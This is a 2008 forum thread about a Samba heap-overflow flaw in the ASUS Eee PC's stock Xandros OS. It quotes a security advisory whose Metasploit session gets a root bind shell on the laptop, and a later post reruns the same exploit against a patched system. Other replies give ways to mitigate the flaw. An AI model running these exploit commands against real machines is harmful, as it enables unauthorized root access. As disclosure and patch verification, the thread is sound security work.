Blog Forum Wiki Links Contact Us NetbookUser
RunCore Pro IV SSD Transforms your ASUS EEE PC by increasing 
performance 5-40X. Your satistfaction guaranteed RunCore Pro 70mm SATA Mini PCI-e SSD
RunCore Pro IV 70mm SATA II Mini PCI-e SSD
RunCore Pro IV 2.5 Inch SATA II SSD

You are not logged in.

#1 2008-02-08 2:20:33 pm

chrismoo
Senior Member
From: VA
Registered: 2007-10-19
Posts: 298
Website

Security issues with Stock OS

From Bugtraq:

Seems the EEE is left open and as they say: Easy to learn, Easy to work, Easy to root

Don't know if this is serious but should people be worried?



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We recently acquired an ASUS Eee PC (if you want to know more about it, a lot of reviews are available on internet). The first thing we did when we put our hands at the ASUS Eee PC was to test its security. The ASUS Eee PC comes with a customized version of Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default).


eeepc-rise:/root> ps -e
  PID TTY          TIME CMD
    1 ?        00:00:00 fastinit
    2 ?        00:00:00 ksoftirqd/0
    3 ?        00:00:00 events/0
    4 ?        00:00:00 khelper
    5 ?        00:00:00 kthread
   25 ?        00:00:00 kblockd/0
   26 ?        00:00:00 kacpid
  128 ?        00:00:00 ata/0
  129 ?        00:00:00 ata_aux
  130 ?        00:00:00 kseriod
  148 ?        00:00:00 pdflush
  149 ?        00:00:00 pdflush
  150 ?        00:00:00 kswapd0
  151 ?        00:00:00 aio/0
  152 ?        00:00:00 unionfs_siod/0
  778 ?        00:00:00 scsi_eh_0
  779 ?        00:00:00 scsi_eh_1
  799 ?        00:00:00 kpsmoused
  819 ?        00:00:00 kjournald
  855 ?        00:00:00 fastinit
  857 ?        00:00:00 sh
  858 ?        00:00:00 su
  859 tty3     00:00:00 getty
  862 ?        00:00:00 startx
  880 ?        00:00:00 xinit
  881 tty2     00:00:06 Xorg
  890 ?        00:00:00 udevd
  952 ?        00:00:00 ksuspend_usbd
  953 ?        00:00:00 khubd
1002 ?        00:00:00 acpid
1027 ?        00:00:00 pciehpd_event
1055 ?        00:00:00 ifplugd
1101 ?        00:00:00 scsi_eh_2
1102 ?        00:00:00 usb-storage
1151 ?        00:00:00 icewm
1185 ?        00:00:01 AsusLauncher
1186 ?        00:00:00 icewmtray
1188 ?        00:00:01 powermonitor
1190 ?        00:00:00 minimixer
1191 ?        00:00:00 networkmonitor
1192 ?        00:00:00 wapmonitor
1193 ?        00:00:00 x-session-manag
1195 ?        00:00:00 x-session-manag
1200 ?        00:00:00 x-session-manag
1201 ?        00:00:00 dispwatch
1217 ?        00:00:00 cupsd
1224 ?        00:00:00 usbstorageapple
1234 ?        00:00:00 kondemand/0
1240 ?        00:00:00 portmap
1248 ?        00:00:00 keyboardstatus
1272 ?        00:00:00 memd
1279 ?        00:00:00 scim-helper-man
1280 ?        00:00:00 scim-panel-gtk
1282 ?        00:00:00 scim-launcher
1297 ?        00:00:00 netserv
1331 ?        00:00:00 asusosd
1476 ?        00:00:00 xandrosncs-agen
1775 ?        00:00:00 dhclient3
2002 ?        00:00:00 nmbd
2004 ?        00:00:00 smbd
2005 ?        00:00:00 smbd
2322 ?        00:00:00 sshd
2345 ?        00:00:00 sshd
2356 pts/0    00:00:00 bash
2362 pts/0    00:00:00 ps
eeepc-rise:/root>


Retrieving the the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit we published earlier last year.


eeepc-rise:/root> smbd --version
Version 3.0.24
eeepc-rise:/root>


With this information, we ran our exploit against the ASUS Eee PC using the Debian/Ubuntu target (Xandros is based on Corel Linux, which is Debian based).


msf > use linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10 RHOST => 192.168.50.10 msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD => linux/x86/shell_bind_tcp msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux vsyscall
   1   Linux Heap Brute Force (Debian/Ubuntu)
   2   Linux Heap Brute Force (Gentoo)
   3   Linux Heap Brute Force (Mandriva)
   4   Linux Heap Brute Force (RHEL/CentOS)
   5   Linux Heap Brute Force (SUSE)
   6   Linux Heap Brute Force (Slackware)
   7   DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1 TARGET => 1 msf exploit(lsa_transnames_heap) > exploit [*] Started bind handler [*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Bound to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected [*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1 [*] Starting interaction with 1...

uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux id
uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)


Easy to learn, Easy to work, Easy to root.


The original blog post and more information can be found in our website at http://risesecurity.org/.

Best regards,
RISE Security
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHrIdmhFjK78TGSUERAnQRAKC+y18h92I4cTnjmDJkTKfdtbno2ACgkdqs
v7aF1eU5H9uSfL4zU5AWCB4=
=pDq2
-----END PGP SIGNATURE-----

Last edited by chrismoo (2008-02-08 2:24:22 pm)

Offline

 

#2 2008-02-08 2:29:11 pm

BCTripster
Senior Member
Registered: 2007-11-19
Posts: 116

Re: Security issues with Stock OS

If security is a concern for anyone using the eee then they should definitely switch it to a full blown Linux distro of some sort. The default Xandros install is not aimed at security but ease of use and certain standard security features in Linux are disabled by default (like multiuser for example smile).

That being said, as this is a highly portable computer it is best to NOT store sensitive data on it.

Offline

 

#3 2008-02-08 2:33:41 pm

chrismoo
Senior Member
From: VA
Registered: 2007-10-19
Posts: 298
Website

Re: Security issues with Stock OS

But being ultra portable in some respects demands security as you're off connecting to public access points, etc.  Being able to root into other peoples machines is a little too easy from looking at this (at a very basic level).

I agree though sensitive info should not be on it or it should be encrypted but that's more than Joe Public would contemplate doing.

Offline

 

#4 2008-02-08 2:42:57 pm

mkrishnan
Moderator
From: Chicago, IL, USA
Registered: 2007-11-06
Posts: 3433

Re: Security issues with Stock OS

I tend to agree, though... yeah, these are all relevant complaints, but we're talking about a PC that doesn't require a password for root access and doesn't even have a screen locking function. This analysis is light years ahead of where the Eee's security actually is.

And yeah, security was about 65% of my decision to leave Xandros for Ubuntu. Windows could be tightened down adequately of course, also, although Ubuntu is generally nicer. smile

Regarding what the average user would do, that's a valid point, although the way most Windows PCs are set up -- no user password and/or automated login are common even on notebooks in my experience -- I'm not sure how an OEM would be expected to broach this topic with the user. Harder though in Asus' case where there's no easy solution inside their OS build for most of those issues. Basically one should not keep any sensitive data on the Eee at all if one uses the default installation.


Mohan

Offline

 

#5 2008-02-08 2:46:17 pm

lagagnon
ExtrEmE User
Registered: 2007-11-10
Posts: 2783

Re: Security issues with Stock OS

One has to take the Bugtraq reports with a grain of salt. They are extremely conservative, and honestly, I wouldn't worry about it too much. MANY Linux distros run smbd by default so that newbies can connect to their Windows shares. Otherwise the newbs have to learn how to start and stop the daemon. If you really want to you can quite easily turn off smbd (if you don't intend to use Samba). I'm not on my Eee box right now but I think all you have to do is go into /etc/rc.d (or is it init.d?) and find the file rc.samba and make it non-executable.


HowTo Ask Questions the Smart Way
You keep believing, I'll keep evolving. Anon

Offline

 

#6 2008-02-08 3:04:17 pm

chrismoo
Senior Member
From: VA
Registered: 2007-10-19
Posts: 298
Website

Re: Security issues with Stock OS

I think it is the version of smbd that is the problem, an update/patch would probably suffice if this is possible - I am predominately Windows so would not know what advice to offer in terms of fixing the solution.  Still I think this is a valid concern and worth highlighting as with what Mohan says we should all try and educate a little security wise and maybe do more to improve on the openness of the OS e.g. having a login screen/password big_smile and fixing any stray/open security issues.

Offline

 

#7 2008-02-09 2:05:43 am

bookmark
Senior Member
Registered: 2008-02-06
Posts: 109

Re: Security issues with Stock OS

So.. should we be worried?

and what exactly is smbd for? (-__-)>??
thanks


I like cheesecakes and muffins
701 4G running easy peasy 1.1 OH YEAH!

Offline

 

#8 2008-02-09 2:22:18 am

BCTripster
Senior Member
Registered: 2007-11-19
Posts: 116

Re: Security issues with Stock OS

I wouldn't fret over this much, essentially for it to be exploited you'd have to be on the same local network as someone with the knowledge they can access a connected eee's root user account. Such a person could wait forever for an eee to appear on their network smile

I'm sure a patched version will be released on the updater since they are aware of it, but I still say there are bigger worries than someone possibly using this exploit to gain access to your eee. They'd be better off just taking it since it really has next to no security features in the default OS.

That is part of the reason I switched mine to Xubuntu .. at least the thieves would get prompted for a password at boot up, but I also don't keep anything sensitive on it anyway.

Here is all the info you'll need on smdb (Samba)

Last edited by BCTripster (2008-02-09 2:27:20 am)

Offline

 

#9 2008-02-09 7:06:38 am

bookmark
Senior Member
Registered: 2008-02-06
Posts: 109

Re: Security issues with Stock OS

BCTripster wrote:

I wouldn't fret over this much, essentially for it to be exploited you'd have to be on the same local network as someone with the knowledge they can access a connected eee's root user account. Such a person could wait forever for an eee to appear on their network smile

I'm sure a patched version will be released on the updater since they are aware of it, but I still say there are bigger worries than someone possibly using this exploit to gain access to your eee. They'd be better off just taking it since it really has next to no security features in the default OS.

That is part of the reason I switched mine to Xubuntu .. at least the thieves would get prompted for a password at boot up, but I also don't keep anything sensitive on it anyway.

Here is all the info you'll need on smdb (Samba)

yikes oh thank you, i thought they can do that though the internet.


I like cheesecakes and muffins
701 4G running easy peasy 1.1 OH YEAH!

Offline

 

#10 2008-02-09 12:13:35 pm

Engineer
Senior Member
From: Germany
Registered: 2007-10-18
Posts: 613

Re: Security issues with Stock OS

chrismoo wrote:

From Bugtraq:
. . .
Retrieving the the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit we published earlier last year.
. . .

Seems that Asus/Xandros is not updating the EEE's OS. I suspect that Asus paid Xandros once for the customization to the EEE and then decided to spend no more money on software.


The three most dangerous things in the world are a programmer with a soldering iron,
a hardware type with a program patch and a user with an idea    --computer saying / R. Cook

Offline

 

#11 2008-02-09 12:21:19 pm

mkrishnan
Moderator
From: Chicago, IL, USA
Registered: 2007-11-06
Posts: 3433

Re: Security issues with Stock OS

It's not just Asus... Xandros is not frequently updated altogether. The versions of Xandros outside of the Eee are generally behind on a lot of things also, because they release updates once every couple of years, whereas Ubuntu for instance does so twice yearly. And I'm not even sure to what extent Xandros is in the habit of publishing security updates or things like that.


Mohan

Offline

 

#12 2008-02-09 12:37:10 pm

Engineer
Senior Member
From: Germany
Registered: 2007-10-18
Posts: 613

Re: Security issues with Stock OS

Let us hope that major Linux distributors ((K)Ubuntu, debian, opensuse, redhat/fedora, etc will see the EEE as a market (Asus plans to sell millions this year) integrate the EEE's drivers (display, acpi, webcam, etc), and offer configurations for the small screen.

Then we will not depend on Asus/Xandros any more.

And let us hope that Asus' field-tests of different BIOS variants produce enough data so that they can code a stable version.


The three most dangerous things in the world are a programmer with a soldering iron,
a hardware type with a program patch and a user with an idea    --computer saying / R. Cook

Offline

 

#13 2008-02-09 1:44:54 pm

pksato
Senior Member
Registered: 2008-01-02
Posts: 114

Re: Security issues with Stock OS

You need to eeepc share files with windows systems?
Not, simple, remove samba package.

Offline

 

#14 2008-02-09 3:02:57 pm

bookmark
Senior Member
Registered: 2008-02-06
Posts: 109

Re: Security issues with Stock OS

pksato wrote:

You need to eeepc share files with windows systems?
Not, simple, remove samba package.

Can you write us a tutorial for that please?


I like cheesecakes and muffins
701 4G running easy peasy 1.1 OH YEAH!

Offline

 

#15 2008-02-09 6:09:33 pm

wormie
New member
Registered: 2008-01-19
Posts: 4

Re: Security issues with Stock OS

bookmark wrote:

pksato wrote:

You need to eeepc share files with windows systems?
Not, simple, remove samba package.

Can you write us a tutorial for that please?

1) Open a terminal
2) Type "apt-get remove samba"
3) Samba is removed

Of if you just want to temporarily disable it:
1) Open a terminal
2) Type "/etc/init.d/samba stop"
3) Breathe easy

Personally, I just plan to disable it when in an insecure environment.

Offline

 

#16 2008-02-09 7:38:22 pm

Paul In SF
Senior Member
From: San Francisco, CA
Registered: 2007-11-09
Posts: 323

Re: Security issues with Stock OS

wormie wrote:

bookmark wrote:

pksato wrote:

You need to eeepc share files with windows systems?
Not, simple, remove samba package.

Can you write us a tutorial for that please?

1) Open a terminal
2) Type "apt-get remove samba"
3) Samba is removed

Of if you just want to temporarily disable it:
1) Open a terminal
2) Type "/etc/init.d/samba stop"
3) Breathe easy
.

And to start it again?

Offline

 

#17 2008-02-09 7:43:59 pm

van der Decken
Senior Member
From: Calgary, Alberta
Registered: 2008-01-13
Posts: 167

Re: Security issues with Stock OS

wormie wrote:

Personally, I just plan to disable it when in an insecure environment.

Hey there's an idea. Add a script to /etc/network/if-up.d/ to bring up Samba if you're on your home network. Add another to /etc/network/if-down.d/ to bring it down. That way you don't even have to think about it when you're out and connected to a public network; it won't even get turned on.

Offline

 

#18 2008-02-09 8:55:41 pm

kost
Member
Registered: 2008-01-23
Posts: 60
Website

Re: Security issues with Stock OS

UPGRADE YOUR SAMBA!

I built new Samba packages fixing problem above.
You need to add ftp.linux.hr repository as stated in this topic:
http://forum.eeeuser.com/viewtopic.php?id=13623

Note that you need to change pinning of ftp.linux.hr repository to be higher than updates of asus/xandros (at least while asus/xandros issues the patch).
I've put 955 in priority field. E.g. - you should put:
Package: *
Pin: origin ftp.linux.hr
Pin-Priority: 955

Then issue:
sudo apt-get update
sudo apt-get upgrade

I tried to make everything compatible with other original xandros packages, so nothing should broke.

I also tried to exploit mentioned vulnerability using this security update and vulnerability is not present any more after update, look for yourself:

Code:

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ msf v3.1-release
+ -- --=[ 265 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 46 aux

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.9.80
RHOST => 192.168.9.80
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux vsyscall
   1   Linux Heap Brute Force (Debian/Ubuntu)
   2   Linux Heap Brute Force (Gentoo)
   3   Linux Heap Brute Force (Mandriva)
   4   Linux Heap Brute Force (RHEL/CentOS)
   5   Linux Heap Brute Force (SUSE)
   6   Linux Heap Brute Force (Slackware)
   7   DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0x08352000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08361000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08370000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0837f000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0838e000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0839d000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083ac000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083bb000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083ca000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083d9000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083e8000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083f7000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08406000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08424000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08433000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
msf exploit(lsa_transnames_heap) >

Offline

 

#19 2008-02-09 11:12:50 pm

billy_b0b
Senior Member
From: USA
Registered: 2008-01-21
Posts: 160

Re: Security issues with Stock OS

i saw this on engadget earlier today.  just upgrade to xunbuntu or win xp


Asus Eee PC 701 4G - Galaxy Black | Transcend 2GB RAM | A-Data 16GB SDHC | 900MHz - Overclocked | 0703 BIOS | WinXP SP2 | Brando Ultra Clear Screen Protector

Offline

 

#20 2008-02-09 11:16:30 pm

bookmark
Senior Member
Registered: 2008-02-06
Posts: 109

Re: Security issues with Stock OS

still can't manage to add repository + Pinning.. etc... (-__-)
too complicate for me...

Last edited by bookmark (2008-02-09 11:17:28 pm)


I like cheesecakes and muffins
701 4G running easy peasy 1.1 OH YEAH!

Offline

 

#21 2008-02-09 11:24:15 pm

lazyfai
Senior Member
From: Hong Kong
Registered: 2008-02-08
Posts: 143
Website

Re: Security issues with Stock OS

If ASUS/Xandros don't do the upgrade, we in XEPC.org will do it.
Stay tuned.


Eee PC 701 x 2, Eee PC 901 x 1
Extended Eee PC - http://www.xepc.org/
XEPC.org upgrade ISO - http://www.sf.net/projects/xepc/

Offline

 

#22 2008-02-10 12:50:26 am

immauss
Member
From: Naples, Italy
Registered: 2008-01-05
Posts: 38
Website

Re: Security issues with Stock OS

For anyone overly concerned, I added two short articles to the wiki last night. One for adding iptables support with the kernel and modules I built, and one for tunrning on some safe logging so the firewall can be monitored.

http://wiki.eeeuser.com/iptables
http://wiki.eeeuser.com/syslog

even the simplest correctly implemented firewall rules will protect from the vulnerability mentioned here.

Offline

 

#23 2008-02-10 9:43:48 am

wormie
New member
Registered: 2008-01-19
Posts: 4

Re: Security issues with Stock OS

Paul In SF wrote:

wormie wrote:

Of if you just want to temporarily disable it:
1) Open a terminal
2) Type "/etc/init.d/samba stop"
3) Breathe easy
.

And to start it again?

/etc/init.d/samba start

Offline

 

#24 2008-02-10 10:51:46 am

bookmark
Senior Member
Registered: 2008-02-06
Posts: 109

Re: Security issues with Stock OS

how come when i try to disable the samba using
/etc/init.d/samba stop

i get this?
Stopping Samba daemons: nmbd/etc/init.d/samba: line 52: start-stop-daemon: commnd not found
smbd/etc/init.d/samba: line 64: start-stop-daemon: command not found
.

please help, thanks in advance


I like cheesecakes and muffins
701 4G running easy peasy 1.1 OH YEAH!

Offline

 

#25 2008-02-10 11:09:32 am

BlueWhale
New member
Registered: 2008-02-10
Posts: 1

Re: Security issues with Stock OS

You should probably launch it as root.
So please type this command in the terminal window :

sudo /etc/init.d/samba stop [ENTER]

Offline

 

Board footer

Powered by PunBB 1.2.15
© Copyright 2002–2005 Rickard Andersson